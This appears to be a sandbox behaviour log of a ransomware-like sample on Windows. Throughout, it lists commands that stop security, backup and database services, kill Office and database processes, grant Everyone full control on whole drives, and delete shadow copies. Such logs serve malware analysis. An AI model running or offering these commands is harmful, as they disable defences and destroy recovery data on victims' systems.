C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Drops file in Windows directory
PID:4540
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
- Drops file in Windows directory
PID:1836
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:1040
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:2488
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:2304
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start Dnscache /y2⤵PID:516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵PID:1872
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start upnphost /y2⤵PID:1988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵PID:4588
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵PID:3616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:2560
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:3964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:2608
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:2164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:2708
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵PID:5012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:3776
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start FDResPub /y2⤵PID:3764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵PID:5292
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop bedbg /y2⤵PID:4608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:5424
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MMS /y2⤵PID:4536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:9920
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:2036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵PID:11332
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3664
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:5212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:13744
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:5272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:13736
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:5396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:14276
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AVP /y2⤵PID:5188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵PID:15468
-
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:8632
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:8624
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:8616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵PID:8592
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
- Kills process with taskkill
PID:8584
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
- Kills process with taskkill
PID:8576
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Kills process with taskkill
PID:8568
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
PID:8560
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
PID:8552
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f2⤵
- Kills process with taskkill
PID:8540
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM rphost.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8532
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f2⤵
- Kills process with taskkill
PID:8524
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ragent.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8508
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8500
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8484
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8468
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8452
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8436
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8420
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8412
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8396
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8380
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8364
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8356
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8348
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8332
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8324
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8316
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8308
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8292
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8284
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8276
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8260
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8252
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8244
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8228
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8220
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8212
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
PID:8196
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:5440
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
PID:1036
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
PID:4504
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
PID:1580
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
PID:3504
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
PID:8180
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
PID:8172
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
PID:8164
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
PID:8148
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
PID:8140
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
PID:8128
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
PID:8120
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
PID:8112
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
PID:8104
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
PID:8096
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
PID:8088
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
PID:8080
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
PID:8072
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:8060
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
PID:8052
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
PID:8036
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵PID:8028
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:8012
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵PID:8004
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵PID:7996
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:7928
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:7888
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EsgShKernel /y2⤵PID:7872
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵PID:7864
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ntrtscan /y2⤵PID:7856
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPUpdateService /y2⤵PID:7840
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPS /y2⤵PID:7832
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:7816
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPSecurityService /y2⤵PID:7808
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop vapiendpoint /y2⤵PID:7216
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵PID:7208
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop WRSVC /y2⤵PID:7200
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:7176
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵PID:5344
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵PID:5280
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵PID:7160
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵PID:7152
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKey /y2⤵PID:7136
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵PID:7128
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop tmlisten /y2⤵PID:7112
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLBrowser /y2⤵PID:7104
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TmCCSF /y2⤵PID:7092
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:7080
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update_64 /y2⤵PID:7072
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:7056
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update /y2⤵PID:7040
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵PID:7032
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_service /y2⤵PID:7020
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵PID:7008
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_filter /y2⤵PID:7000
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:6984
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop svcGenericHost /y2⤵PID:6968
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:6960
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵PID:6944
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:6936
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophossps /y2⤵PID:6920
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:6912
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SntpService /y2⤵PID:6896
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:6884
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SmcService /y2⤵PID:6872
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:6864
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Smcinst /y2⤵PID:6848
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵PID:6840
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ShMonitor /y2⤵PID:6824
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:6808
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SepMasterService /y2⤵PID:6800
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:6792
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVService /y2⤵PID:6776
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:6768
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVAdminService /y2⤵PID:6752
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵PID:6744
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sacsvr /y2⤵PID:6728
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:6720
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵PID:6704
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:6688
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵PID:6680
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfevtp /y2⤵PID:6664
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RESvc /y2⤵PID:6656
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵PID:6640
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfemms /y2⤵PID:6632
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:6616
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵PID:6608
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfefire /y2⤵PID:6592
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop OracleClientCache80 /y2⤵PID:6584
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:6568
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McTaskManager /y2⤵PID:6560
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL80 /y2⤵PID:6544
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵PID:6536
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McShield /y2⤵PID:6520
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL57 /y2⤵PID:6512
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:6496
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:6488
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵PID:6480
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamMountSvc /y2⤵PID:6472
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFramework /y2⤵PID:6464
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:6456
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:6440
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeEngineService /y2⤵PID:6432
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵PID:6416
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:6408
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBEndpointAgent /y2⤵PID:6396
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLSERVER /y2⤵PID:6388
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵PID:6380
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBAMService /y2⤵PID:6372
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:6364
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:6356
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop masvc /y2⤵PID:6348
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:6336
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵PID:6328
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop macmnsvc /y2⤵PID:6320
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:6308
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵PID:6300
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop klnagent /y2⤵PID:6292
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:6284
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵PID:6276
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop kavfsslp /y2⤵PID:6268
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:6256
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵PID:6248
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFSGT /y2⤵PID:6240
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:6232
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLWriter /y2⤵PID:6224
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFS /y2⤵PID:6216
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:6208
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:6196
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop FA_Scheduler /y2⤵PID:6188
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:6180
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SDRSVC /y2⤵PID:6172
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ESHASRV /y2⤵PID:6160
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:6152
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DCAgent /y2⤵PID:5300
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:5232
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:5220
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:4644
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵PID:1744
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5172
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Antivirus /y2⤵PID:1728
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:5148
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:2656
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3216
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROD /y2⤵PID:3644
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:2192
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵PID:6136
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:6128
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵PID:6120
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵PID:6112
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:6104
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:6096
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵PID:6088
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop audioendpointbuilder /y2⤵PID:6080
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵PID:6072
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:6064
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵PID:6056
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵PID:6048
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:6040
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ARSM /y2⤵PID:6032
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵PID:6024
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeimap4 /y2⤵PID:6016
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵PID:6008
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵PID:6000
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:5992
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵PID:5984
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeadtopology /y2⤵PID:5976
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵PID:5968
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵PID:5960
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵PID:5952
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵PID:5944
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵PID:5936
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSRS /y2⤵PID:5928
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop W3Svc /y2⤵PID:5920
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:5912
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵PID:5904
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPS /y2⤵PID:5896
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵PID:5888
